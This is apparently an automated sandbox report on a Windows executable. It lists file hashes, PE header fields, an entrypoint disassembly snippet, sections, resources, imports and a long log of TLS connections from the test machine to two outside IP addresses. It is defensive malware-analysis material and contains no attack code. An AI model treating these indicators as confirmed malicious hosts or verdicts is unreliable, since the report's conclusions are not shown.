SHA512:	bbc6f4f7a9af163b1299119e9e332f24c164efa7f98591e7425bbd33d47a26b99a3b06038504944a28c10edeaf8fd27614d0ea68f2913f51204edd2fe09d86f9
SSDEEP:	1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfnxoVAmHLjHnXpnOK:fq6+ouCpk2mpcWJ0r+QNTBfnULHH3pl
TLSH:	F8A38D45F2E242F7E9E10A7100A6722F973A76249724E8DBC34C3D839553AD59A3C3E9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....z...............0....@........................................................................

File Icon


Icon Hash:	33e1a1a4a6a4818b

Static PE Info

General

Entrypoint:	0x401000
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x5D400562 [Tue Jul 30 08:52:50 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5877688b4859ffd051f6be3b8e0cd533

Entrypoint Preview

Instruction
push 000000ACh
push 00000000h
push 00418010h
call 00007F1BB8C75441h
add esp, 0Ch
push 00000000h
call 00007F1BB8C7543Ah
mov dword ptr [00418014h], eax
push 00000000h
push 00001000h
push 00000000h
call 00007F1BB8C75427h
mov dword ptr [00418010h], eax
call 00007F1BB8C753A1h
mov eax, 00417088h
mov dword ptr [00418034h], eax
call 00007F1BB8C7E1C2h
call 00007F1BB8C7DF2Eh
call 00007F1BB8C7AE28h
call 00007F1BB8C7A6ACh
call 00007F1BB8C7A13Fh
call 00007F1BB8C79EB9h
call 00007F1BB8C799DDh
call 00007F1BB8C7915Dh
call 00007F1BB8C75725h
call 00007F1BB8C7CAA8h
call 00007F1BB8C7B550h
mov edx, 0041702Eh
lea ecx, dword ptr [0041801Ch]
call 00007F1BB8C753B8h
push FFFFFFF5h
call 00007F1BB8C753C8h
mov dword ptr [0041803Ch], eax
mov eax, 00000200h
push eax
lea eax, dword ptr [004180B8h]
push eax
xor eax, eax
push eax
push 00000015h
push 00000004h
call 00007F1BB8C7A102h
push dword ptr [004180A0h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1717c	0xc8	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19000	0x329c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x17470	0x22c	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x37f0	0x3800	6c0f4094a5493360ae8c9032ef3a9f47	False	0.47140066964285715	data	5.608776130769213	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.text	0x5000	0xd2c2	0xd400	1da643e4b1937b50550f9d9e8250428e	False	0.5114239386792453	data	6.558083729279072	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x339d	0x3400	4fb07923b0eb72c40319d48fd2d4f13f	False	0.8046123798076923	data	7.110640338733979	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x172c	0x1200	b04166e46a18d11ceb7c9e93bc590cd2	False	0.3940972222222222	data	4.997217661149305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x19000	0x329c	0x3400	b64dbe8885505d72259e11678a6a095e	False	0.9015925480769231	data	7.812830291800238	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x192ac	0x1f2d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9535145971682747
RT_RCDATA	0x1b1dc	0xe	zlib compressed data	1.5714285714285714
RT_RCDATA	0x1b1ec	0xc	data	1.6666666666666667
RT_RCDATA	0x1b1f8	0xe25	data	1.0030378348522508
RT_RCDATA	0x1c020	0x1	very short file (no magic)	9.0
RT_GROUP_ICON	0x1c024	0x14	data	1.05
RT_MANIFEST	0x1c038	0x263	XML 1.0 document, ASCII text	0.5319148936170213

Imports

DLL	Import
MSVCRT.dll	memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
KERNEL32.dll	GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, GetProcAddress, GetVersionExW, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
USER32.DLL	CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
GDI32.DLL	GetStockObject
COMCTL32.DLL	InitCommonControlsEx
SHELL32.DLL	ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
WINMM.DLL	timeBeginPeriod
OLE32.DLL	CoInitialize, CoTaskMemFree
SHLWAPI.DLL	PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 19:36:15.536632061 CET	49730	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:15.536690950 CET	443	49730	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:15.536813021 CET	49730	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:15.548180103 CET	49730	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:15.548204899 CET	443	49730	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:17.225205898 CET	443	49730	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:17.225411892 CET	49730	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:17.229906082 CET	49730	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:17.229919910 CET	443	49730	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:17.230128050 CET	443	49730	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:17.241655111 CET	49730	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:17.287334919 CET	443	49730	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:18.130939960 CET	443	49730	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:18.131196022 CET	443	49730	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:18.131232023 CET	443	49730	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:18.131283998 CET	49730	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:18.131331921 CET	49730	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:18.134751081 CET	49730	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:18.284394026 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:18.284468889 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:18.284563065 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:18.285060883 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:18.285072088 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:19.510910988 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:19.511158943 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:19.514168024 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:19.514178991 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:19.514419079 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:19.515286922 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:19.555325031 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:19.989486933 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:19.989659071 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:19.989737034 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:19.989741087 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:19.989778996 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:19.989825964 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:19.998039961 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.006494999 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.006541014 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.006700993 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.006747007 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.006791115 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.014978886 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.023436069 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.023607969 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.023648977 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.070702076 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.109949112 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.150609016 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.150655031 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.182287931 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.182498932 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.182508945 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.187613010 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.187676907 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.187683105 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.201278925 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.201344967 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.201350927 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.201356888 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.201402903 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.208950043 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.216706038 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.216778994 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.216779947 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.216789961 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.216948986 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.224484921 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.232094049 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.232175112 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.232196093 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.239886045 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.240032911 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.240039110 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.247741938 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.247792006 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.247797966 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.259659052 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.259702921 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.259711027 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.259721041 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.259764910 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.265573025 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.272614956 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.272655964 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.272665024 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.272759914 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.272799969 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.272804022 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.272840977 CET	443	49731	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:20.272882938 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:20.303946972 CET	49731	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:25.132711887 CET	49732	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:25.132776976 CET	443	49732	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:25.132864952 CET	49732	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:25.136094093 CET	49732	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:25.136116028 CET	443	49732	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:26.715478897 CET	443	49732	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:26.715750933 CET	49732	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:26.718288898 CET	49732	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:26.718311071 CET	443	49732	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:26.718518019 CET	443	49732	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:26.724544048 CET	49732	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:26.771337032 CET	443	49732	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:27.640785933 CET	443	49732	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:27.641012907 CET	443	49732	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:27.641043901 CET	443	49732	20.233.83.145	192.168.2.4
Dec 5, 2024 19:36:27.641082048 CET	49732	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:27.641122103 CET	49732	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:27.641916037 CET	49732	443	192.168.2.4	20.233.83.145
Dec 5, 2024 19:36:27.644865036 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:27.644922972 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:27.645009995 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:27.645350933 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:27.645373106 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:28.880546093 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:28.880789995 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:28.882405043 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:28.882424116 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:28.882641077 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:28.883578062 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:28.931337118 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.393090963 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.393358946 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.393424988 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.393457890 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.393558025 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.393583059 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.393596888 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.393604994 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.393646955 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.401760101 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.409734011 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.409780025 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.409789085 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.418097019 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.418148041 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.418167114 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.469683886 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.469708920 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.517590046 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.517621994 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.565587997 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.588236094 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.592207909 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.592259884 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.592274904 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.600074053 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.600121021 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.600143909 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.607788086 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.607827902 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.607837915 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.615593910 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.615643024 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.615653992 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.623389959 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.623436928 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.623446941 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.675579071 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.675592899 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.678642988 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.678653955 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.678706884 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.678726912 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.678778887 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.678818941 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.678848028 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.678864002 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.678864002 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.678870916 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.678880930 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.678893089 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.723583937 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.803333044 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.803344965 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.803395033 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.803397894 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.803442001 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.803468943 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.803468943 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.803484917 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.803497076 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.803529978 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.845169067 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.845185041 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.845244884 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.845293045 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.845305920 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.845340014 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.866024017 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.866080999 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.866101980 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.866132021 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.866147041 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.914568901 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.914757967 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.914776087 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.914810896 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.914836884 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.914849043 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.914866924 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.914907932 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.982772112 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.982798100 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.982853889 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.982882977 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:29.982912064 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:29.982939959 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.002233028 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.002260923 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.002397060 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.002428055 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.002466917 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.019157887 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.019176960 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.019243002 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.019270897 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.019296885 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.019320011 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.063638926 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.063668013 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.063720942 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.063752890 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.063785076 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.063802004 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.076729059 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.076746941 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.076827049 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.076852083 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.076889992 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.088130951 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.088149071 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.088203907 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.088228941 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.088383913 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.173006058 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.173031092 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.173084974 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.173106909 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.173141956 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.173158884 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.185841084 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.185861111 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.185903072 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.185920000 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.185951948 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.185975075 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.198750019 CET	443	49733	185.199.109.133	192.168.2.4
